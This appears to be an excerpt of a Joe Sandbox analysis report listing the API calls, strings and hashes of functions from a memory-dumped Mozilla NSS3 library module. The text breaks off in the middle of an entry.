Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C58BC19
Part of subcall function 6C58BB80: free.MOZGLUE(00000000), ref: 6C58BC22

PR_NewCondVar.NSS3(?), ref: 6C6B9CF0
PR_NewPollableEvent.NSS3 ref: 6C6B9D03

Part of subcall function 6C6AF3B0: PR_CallOnce.NSS3(6C7014B0,6C6AF510), ref: 6C6AF3E6
Part of subcall function 6C6AF3B0: PR_CreateIOLayerStub.NSS3(6C70006C), ref: 6C6AF402
Part of subcall function 6C6AF3B0: PR_Malloc.NSS3(00000004), ref: 6C6AF416
Part of subcall function 6C6AF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C6AF42D
Part of subcall function 6C6AF3B0: PR_SetSocketOption.NSS3(?), ref: 6C6AF455
Part of subcall function 6C6AF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C6AF473

Part of subcall function 6C669890: TlsGetValue.KERNEL32(?,?,?,6C6697EB), ref: 6C66989E

EnterCriticalSection.KERNEL32(?), ref: 6C6B9D78
calloc.MOZGLUE(00000001,0000000C), ref: 6C6B9DAF
_PR_CreateThread.NSS3(00000000,6C6B9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C6B9D9F

Part of subcall function 6C58B3C0: TlsGetValue.KERNEL32 ref: 6C58B403
Part of subcall function 6C58B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C58B459

_PR_CreateThread.NSS3(00000000,6C6BA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C6B9DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6C6B9DFC
_PR_CreateThread.NSS3(00000000,6C6BA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C6B9E29
calloc.MOZGLUE(00000001,0000000C), ref: 6C6B9E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6C6B9E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C6B9E89

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: f614fe683049d851dec13fe8eb8ffca8c78a67e28fae1a55eaadddec62cb06cb
Instruction ID: 84f36f3a32c9966ca3cbd02cc87a377571484d98f73ab0ad3c5b345fe464149f
Opcode Fuzzy Hash: f614fe683049d851dec13fe8eb8ffca8c78a67e28fae1a55eaadddec62cb06cb
Instruction Fuzzy Hash: EF614DB1900706AFD710DF75D844A67BBF8FF49308B04452AE85AD7B51E730E825CBA9

Function 6C5B3FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

SECKEY_CopyPublicKey.NSS3(?), ref: 6C5B4014

Part of subcall function 6C5B39F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C5B5E6F,?), ref: 6C5B3A08
Part of subcall function 6C5B39F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C5B5E6F), ref: 6C5B3A1C
Part of subcall function 6C5B39F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B3A3C

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B4038

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C5B404D

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C6CA0F4), ref: 6C5B40C2

Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C5FF0C8
Part of subcall function 6C5FF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5FF122

SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C5B409A

Part of subcall function 6C5FBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C5AE708,00000000,00000000,00000004,00000000), ref: 6C5FBE6A
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C5B04DC,?), ref: 6C5FBE7E
Part of subcall function 6C5FBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C5FBEC2

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B40DE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B40F4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5B4108
SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C5B411A
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C5B4137
SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C5B4150
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C6CA1C8), ref: 6C5B417E
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C5B4194
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C5B41A7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B41B2
PK11_DestroyObject.NSS3(?,?), ref: 6C5B41D9
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5B41FC
SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C6CA1A8), ref: 6C5B422D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
String ID:
API String ID: 912348568-0
Opcode ID: 1a90ce871c7a6109a95e4731e4f57b0548c1f21476a08ef67bd95c6d173330b3
Instruction ID: ebcbfd236f26812b4d2b3a180a7dbe7416d17fb627779044a6586413a1b7b636
Opcode Fuzzy Hash: 1a90ce871c7a6109a95e4731e4f57b0548c1f21476a08ef67bd95c6d173330b3
Instruction Fuzzy Hash: 12510AB5F00300ABF7249B259C51B677ADCDF9124CF044918ED6AE6F82FB31D908C666

Function 6C5F8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8E9E
PORT_ArenaAlloc_Util.NSS3(6C700B64,00000001,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C5F8E01,00000000,6C5F9060,6C700B64), ref: 6C5F8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C5F8E01), ref: 6C5F8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C700B64,6C700B64), ref: 6C5F8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C5F8F3F

Part of subcall function 6C5FA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C5FA421,00000000,00000000,6C5F9826), ref: 6C5FA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5F904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C5F8E76

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 0f45e86c31b8d3e636051ff1a2b3560a79e00d792097b40ec99e2fb8a20bc049
Instruction ID: 14d8bbddb63b341c66709fb5f76b85827c01dc570b6cd5b4ce18d64d5bd552bc
Opcode Fuzzy Hash: 0f45e86c31b8d3e636051ff1a2b3560a79e00d792097b40ec99e2fb8a20bc049
Instruction Fuzzy Hash: 0C6191B5E001069FDB14CF56CC80AABB7B9EF85358F144528DD29A7700E732A916CFA5

Function 6C5A8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C5A8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5A8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6D18D0,?), ref: 6C5A8F03
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A8F19
PL_FreeArenaPool.NSS3(?), ref: 6C5A8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5A8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5A8F65
PL_FinishArenaPool.NSS3(?), ref: 6C5A8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C5A8FFE
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A9012
PL_FreeArenaPool.NSS3(?), ref: 6C5A9024
PL_FinishArenaPool.NSS3(?), ref: 6C5A902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C5A903E

Strings

security, xrefs: 6C5A8EE7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 8e9cc2bcf41031ebc019629a27df8314121d0be09426188744574dcf1398468c
Instruction ID: cfa52762f4ce349c662f0abf17233bbc9d650ac10e3ffb8c8de6b471a94c318c
Opcode Fuzzy Hash: 8e9cc2bcf41031ebc019629a27df8314121d0be09426188744574dcf1398468c
Instruction Fuzzy Hash: F55149B1608240EBD7149A969C41BAF73E8AF8635CF44082EF95597B40D731D90AC75B

Function 6C66CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C66CC7B), ref: 6C66CD7A

Part of subcall function 6C66CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C5DC1A8,?), ref: 6C66CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C66CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C66CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C66CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C66CD8E

Part of subcall function 6C5905C0: PR_EnterMonitor.NSS3 ref: 6C5905D1
Part of subcall function 6C5905C0: PR_ExitMonitor.NSS3 ref: 6C5905EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C66CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C66CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C66CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C66CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C66CE48

Strings

getaddrinfo, xrefs: 6C66CD88, 6C66CDF9
wship6.dll, xrefs: 6C66CDE3
getnameinfo, xrefs: 6C66CDB2, 6C66CE23
freeaddrinfo, xrefs: 6C66CD9F, 6C66CE10
ws2_32.dll, xrefs: 6C66CD75

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: f1a92cc2ed85dd1bfbb2b526f166a4cf9c9f64a83f3a2b456f54731867912615
Instruction ID: 59833a5ebfbcefb95dc28fd1132b9e10c1bc3da33af6fe27e9681475176f7119
Opcode Fuzzy Hash: f1a92cc2ed85dd1bfbb2b526f166a4cf9c9f64a83f3a2b456f54731867912615
Instruction Fuzzy Hash: FC11A2F5E1396163DB0166766C009AE39E85B8225CB184939D807D2E01FF22E9498BEF

Function 6C6B1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C6B13BC,?,?,?,6C6B1193), ref: 6C6B1C6B
PR_NewLock.NSS3(?,6C6B1193), ref: 6C6B1C7E

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

PR_NewCondVar.NSS3(00000000,?,6C6B1193), ref: 6C6B1C91

Part of subcall function 6C58BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C5921BC), ref: 6C58BB8C

PR_NewCondVar.NSS3(00000000,?,?,6C6B1193), ref: 6C6B1CA7

Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C58BBEB
Part of subcall function 6C58BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C58BBFB
Part of subcall function 6C58BB80: GetLastError.KERNEL32 ref: 6C58BC03
Part of subcall function 6C58BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C58BC19
Part of subcall function 6C58BB80: free.MOZGLUE(00000000), ref: 6C58BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6C6B1193), ref: 6C6B1CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6C6B1193), ref: 6C6B1CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C6B1193), ref: 6C6B1CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D1A

Part of subcall function 6C669BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C591A48), ref: 6C669BB3
Part of subcall function 6C669BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C591A48), ref: 6C669BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D3D

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6C6B1193), ref: 6C6B1D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C6B1193), ref: 6C6B1D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C6B1193), ref: 6C6B1D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6C6B1193), ref: 6C6B1D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6C6B1193), ref: 6C6B1D93
PR_DestroyLock.NSS3(00000000,?,?,6C6B1193), ref: 6C6B1D9F
free.MOZGLUE(00000000,?,6C6B1193), ref: 6C6B1DA8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 473a42908e20131b6a369ea4c627d3b2e3d086471242e62c9c30659d3ba1ac09
Instruction ID: 9da3f0454cfda178375c2159c163ccd267f6f2899f73f09db4693f8fc48224c5
Opcode Fuzzy Hash: 473a42908e20131b6a369ea4c627d3b2e3d086471242e62c9c30659d3ba1ac09
Instruction Fuzzy Hash: 4931E9F1E00701ABEB209F25AC41A9776F8EF4174DF044439E84A97B51FB71E818CB9A

Function 6C5C5E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5C5ECF
EnterCriticalSection.KERNEL32(?), ref: 6C5C5EE3
PR_Unlock.NSS3(?), ref: 6C5C5F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C5C5FB5

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6C5C61F4
S&^l, xrefs: 6C5C5E6C, 6C5C627F, 6C5C5F12
S&^l, xrefs: 6C5C62E3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT$S&^l$S&^l
API String ID: 2280678669-3530093371
Opcode ID: cea932549119ecfa9efe5f205fbb22791f2d60b8eaf5a06ddae13c5d1e7ff60f
Instruction ID: 3a7ed4e557d13b3b1a1951a5f2e4018be67c2d5d7641cce8259185e7e4153f1d
Opcode Fuzzy Hash: cea932549119ecfa9efe5f205fbb22791f2d60b8eaf5a06ddae13c5d1e7ff60f
Instruction Fuzzy Hash: 2DF115B4A00215CFDB44CF58C884B96BBF4FF49304F5482AAD9089B746E7B4EA85CF91

Function 6C610C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,al), ref: 6C610C81

Part of subcall function 6C5FBE30: SECOID_FindOID_Util.NSS3(6C5B311B,00000000,?,6C5B311B,?), ref: 6C5FBE44

Part of subcall function 6C5E8500: SECOID_GetAlgorithmTag_Util.NSS3(6C5E95DC,00000000,00000000,00000000,?,6C5E95DC,00000000,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5E8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C610CC4

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C610CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C610D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C610D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C610D7D
free.MOZGLUE(00000000), ref: 6C610DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C610DC1
free.MOZGLUE(00000000), ref: 6C610DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C610E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C610E0F

Part of subcall function 6C5E95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5E95E0
Part of subcall function 6C5E95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5E95F5
Part of subcall function 6C5E95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C5E9609
Part of subcall function 6C5E95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C5E961D
Part of subcall function 6C5E95C0: PK11_GetInternalSlot.NSS3 ref: 6C5E970B
Part of subcall function 6C5E95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C5E9756
Part of subcall function 6C5E95C0: PK11_GetIVLength.NSS3(?), ref: 6C5E9767
Part of subcall function 6C5E95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C5E977E
Part of subcall function 6C5E95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5E978E

Strings

-$al, xrefs: 6C610C64
*,al, xrefs: 6C610C69, 6C610DE0, 6C610C80, 6C610C8B, 6C610CAF
*,al, xrefs: 6C610DCC

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,al$*,al$-$al
API String ID: 3136566230-3270327906
Opcode ID: 726f32e5662f7fb20380f2bdbba6dc4993cfe432192d9c0456e712f0674d3b53
Instruction ID: 09e55e3f999a3198077b2942e379939c55e74850449a2c12db6195549ce9a2aa
Opcode Fuzzy Hash: 726f32e5662f7fb20380f2bdbba6dc4993cfe432192d9c0456e712f0674d3b53
Instruction Fuzzy Hash: B541E3B1D00245ABEF009F69DC41BEF7AB4EF45309F104128E91567B41EB35EA24CBEA

Function 6C605CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C605EC0,00000000,?,?), ref: 6C605CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C605CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C605CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C605D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C605EC0,00000000,?,?), ref: 6C605D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C605D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C605D80

Strings

multiaccess:, xrefs: 6C605CB8
extern:, xrefs: 6C605CEA, 6C605D4B
